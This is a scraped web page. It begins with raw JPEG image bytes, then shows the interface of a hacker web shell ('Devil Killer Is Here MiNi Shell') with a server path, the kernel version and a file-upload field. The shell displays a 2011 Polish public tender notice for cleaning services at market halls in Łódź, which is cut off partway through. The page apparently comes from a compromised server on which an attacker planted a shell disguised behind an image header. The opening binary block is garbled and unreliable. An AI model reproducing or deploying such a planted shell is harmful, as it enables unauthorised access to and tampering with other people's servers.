JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111019/343120-N-2011.html

<p class="kh_header"><b>Łódź: Sprzątanie obiektów</b><br>
<b>Numer ogłoszenia: 343120 - 2011; data zamieszczenia: 19.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Hale Targowe , al. Politechniki 32, 98-980 Łódź, woj. łódzkie, tel. 42 6385950, faks 42 6385950.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie obiektów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamóienia obejmuje sprzątanie obiektów administrowanych  przez Hale Targowe 
Zakres prac - teren wokół hali przy ul. Małej 2 (front, zaplecze) o pow. 450,00 m2
a)utrzymanie czystości i porządku tj. codzienne sprzątanie po zakończeniu handlu około godziny 18:00, w soboty ok. godz. 15:00 i sprzątanie uzupełniające w godzinach 8:00-10:00 ( polegające na sprawdzeniu stanu czystości oraz usunięciu nieprawidłowości), usługę należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)utrzymywanie porządku przy pojemnikach na śmieci - chlorowanie powierzchni na której ustawione są pojemniki, zimą odśnieżanie,
e)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
f)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac - sprzątanie wewnętrznych powierzchni w hali targowej  przy ul. Małej 2 o pow. wewnętrznej 620,00 m2:
a)godziny rozpoczęcia sprzątania: poniedziałek - piątek od godziny 18:00, sobota od godziny 15:00, oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie jesienno - zimowym sprzątanie uzupełniające ok. południa polegające na usunięciu błota i nieczystości z ciągów komunikacyjnych,
c) zamiatanie i mycie powierzchni płyty głównej codziennie,
d)dbanie o drożność i czystość kratek ściekowych,
e)mycie windy towarowej i jej drzwi - 2 razy w tygodniu,
f)sprzątanie korytarzy i schodów prowadzących do piwnicy 3 razy w tygodniu,
g)opróżnienie koszy, wymiana worków na nowe, wyniesienie śmieci do pojemnika na zewnątrz codziennie, 
h)mycie drzwi bocznych do hali szt. 6 (22 m2) w zależności od potrzeb, min. 1 raz w miesiącu,
i)mycie antresoli i schodów prowadzących na nią - codziennie,
j)utrzymanie w czystości wejść głównych szt. 2 -codziennie, w okresie jesienno- zimowym 2 razy dziennie,
k)mycie drzwi automatycznych + terakoty na ścianach 82 m2  w zależności od potrzeb, min. 1 raz w miesiącu,
l)dwa razy w roku mycie dachów nad sklepami 600 m2 i okien zewnętrznych 16,76 m2.

Zakres prac - teren wokół hali targowej Górniak o pow. 3458,00 m2,
a)utrzymanie czystości i porządku ze sprzątaniem po zakończeniu handlu około godziny 18:00, w soboty ok. godz. 15:00 i sprzątaniem uzupełniającym w godzinach 8:00-10:00 (polegające na sprawdzeniu stanu czystości oraz usunięciu nieprawidłowości), usługę należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce i o godzinie wskazanej przez Zamawiającego.

Zakres prac - sprzątanie wewnętrznych powierzchni w hali targowej Górniak o pow. wewnętrznej 2058,95 m2 
a)godziny rozpoczęcia sprzątania: poniedziałek - piątek od godziny 17:00, sobota od godziny 15:00, oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie jesienno - zimowym sprzątanie uzupełniające ok. południa polegające na usunięciu błota i nieczystości z ciągów komunikacyjnych,
c)antresola powierzchnia 630m2
    zamiatanie posadzki codziennie,3 razy w tygodniu mycie posadzki i balustrad, mycie i opróżnienie koszy, wymiana worków na nowe, wyniesienie śmieci do pojemnika na  zewnątrz codziennie,
d)Klatki schodowe szt. 4 - 82 m2
- zamiatanie, mycie 3 razy w tygodniu lub w razie potrzeby,raz na kwartał mycie żaluzji,
e)Wejście do hali szt. 4 i płyta główna - 1346 m2
- zamiatanie i mycie specjalistyczną maszyną posadzki płyty głównej do stanu jednorodności powierzchni bez smug i zacieków, codziennie,zamiatanie i mycie wejść do hali  szt. 4 i schodów zewnętrznych codziennie, w okresie jesienno- zimowym 2 razy dziennie,zamiatanie i mycie bram wjazdowych szt. 2 codziennie,
- mycie szyb w drzwiach wejściowych i automatycznych 180 m2, min. raz w tygodniu lub w razie potrzeby,  mycie bram automatycznych 35 m2 raz w miesiącu lub w razie potrzeby,mycie, dezynfekcja i sprzątanie toalet dla najemców hali szt. 3, WC administracji, szatni i pomieszczeń gospodarczych, według potrzeb, minimum raz dziennie.  raz w tygodniu mycie glazury na ścianach w wejściach około 120 m2, 2 razy w roku mycie dachów nad pawilonami handlowymi wewnątrz hali 650 m2 usuwanie pajęczyn i kurzu ze ścian, sufitów, lamp oświetleniowych.

targowisk Jaracza /Kilińskiego, Pomorska-Kilińskiego, WiN,  Przędzalniana 95, pasaż handlowy ul. Ogrodowa 4, targowisko Felińskiego.  

Zakres prac-  sprzątanie targowiska przy ul. Jaracza-Kilińskiego w Łodzi o pow. 480,00 m2

a)utrzymanie czystości i porządku ze sprzątaniem po  zakończeniu handlu około godziny 18:00 oraz w niedziel handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac - sprzątanie targowiska przy ul.  Pomorska-Kilińskiego w Łodzi o pow. 314,00 m2
a)targowisko sprzątane 2 razy w tygodniu tzn. wtorek i sobota po zakończeniu handlu ok. godz. 17:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu,
b) w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d) usługę odśnieżania  należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac- sprzątanie targowiska przy ul. Organizacji  WiN w Łodzi o pow. 2000,00 m2
a) targowiska sprzątane 1 razy w tygodniu we wtorek po zakończeniu handlu ok. godz. 17:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu, 
b) w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz  wywóz nadmiaru śniegu,
c) w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć  w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac -sprzątanie targowiska przy ul. Przędzalniana 95 w Łodzi o pow. 300,00 m2,
a)targowiska sprzątane 1 raz w tygodniu w piątek po zakończeniu handlu ok. godz. 17:00 oraz 
w niedziele handlowe przed świętami po zakończeniu handlu,
b) w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz  wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego. 

Zakres prac - sprzątanie pasażu handlowego przy ul. Ogrodowej 4 w Łodzi o pow. 480,00 m2,

a)targowisko sprzątane 2 razy w tygodniu po zakończeniu handlu we wtorek ok. godz. 17:00 i sobotę ok. godz. 15:00 oraz w niedziele handlowe przed świętami po zakończeniu handlu,
b)utrzymanie czystości w WC dla najemców pow. 9 m2 sprzątanie dwa razy w tygodniu,
c)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
d)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
e)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkwo w niedziele handlowe przed świętami,
f)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazne przez Zamawiającego. 

Zakres prac -  sprzątanie targowiska przy ul. Felińskiego w Łodzi o pow. 2680,00 m2
a)utrzymanie czystości i porządku ze sprzątaniem bieżącym po  zakończeniu handlu około godziny 18:00 i sprzątaniem uzupełniającym w godzinach 8:00-10:00,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz nadmiaru śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6.00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
d)usługę odśnieżania należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami,
e)zebrane i posegregowane  nieczystości stałe należy wyrzucać w miejsce wskazane przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania warunków udziału w postępowaniu zostanie dokonana metodą spełnia - nie spełnia, na podstawie przedłożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem warunków szczegółowych określonych w punkcie jest przedłożenie przez Wykonawcę wraz z ofertą: oświadczenia o posiadaniu niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia oraz o spełnianiu warunków udziału w Postępowaniu na podstawie art. 22 ust. 1 Ustawy i nie podleganiu wykluczeniu z Postępowania na podstawie art. 24 ust. 1 Ustawy - wg Załącznika nr 2 do SIWZ - lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, zawierające zakres czynności, które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów; wykazu wykonanych w ciągu ostatnich trzech lat (2009-2011) przynajmniej 3 usług  o podobnym charakterze i wielkości jak przedmiot zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców- wg załącznika nr 5 do SIWZ; w wykazie należy podać także usługi świadczone na rzecz Zamawiającego; dokumentów (np.: referencje) potwierdzających, że usługi te zostały należycie wykonane. W przypadku świadczenia prac objętych zamówieniem dla Zamawiającego, referencje nie są wymagane</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem warunków szczegółowych określonych w punkcie jest przedłożenie przez Wykonawcę wraz z ofertą: wykazu narzędzi i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie ich dysponowania. Wykonawca musi wykazać, iż dysponuje co najmniej jednym pojazdem mechanicznym służącym do odśnieżania ( np. traktor zaopatrzony w pług), maszynę czyszczącą posadzki (dot. Części 1); a osoby, które będą obsługiwać ww. sprzęt posiadają odpowiednie uprawnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jak w pkt. 3.2 i 3.3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem warunków szczegółowych określonych w punkcie jest przedłożenie przez Wykonawcę wraz z ofertą: oświadczenia potwierdzającego, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne i podatków z tytułu prowadzonej działalności lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wraz z kserokopią decyzji właściwego organu - wg załącznika nr 3 do SIWZ; opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość co najmniej 50.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">np. referencje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.haletargowe.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Hale Targowe, Al. Politechniki 32, 90-890 Łódź III p. 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 10:00, miejsce: Hale Targowe, Al. Politechniki 32, 90-890 Łódź III p. 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Hale targowe i teren wokół - ul. Mała 2 i ul. Piotrkowska 317.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac - teren wokół hali przy ul. Małej 2 (front, zaplecze) o pow. 450,00 m2
a)utrzymanie czystości i porządku tj. codzienne sprzątanie po zakończeniu handlu około godziny 18:00, w soboty ok. godz. 15:00 i sprzątanie uzupełniające w godzinach 8:00-10:00 ( polegające na sprawdzeniu stanu czystości oraz usunięciu nieprawidłowości), usługę należy wykonywać od poniedziałku do soboty oraz  dodatkowo w niedziele handlowe przed świętami po zakończeniu handlu,
b)w okresie zimowym odśnieżanie, posypywanie odśnieżonego terenu mieszaniną piasku i soli oraz   wywóz śniegu,
c)w okresie zimowym w czasie opadów śniegu, odśnieżanie należy rozpocząć od godziny 6:00 rano lub najpóźniej 1,5 godz. po wystąpieniu opadów i zakończyć w 1,5 godz. po ustąpieniu opadów,
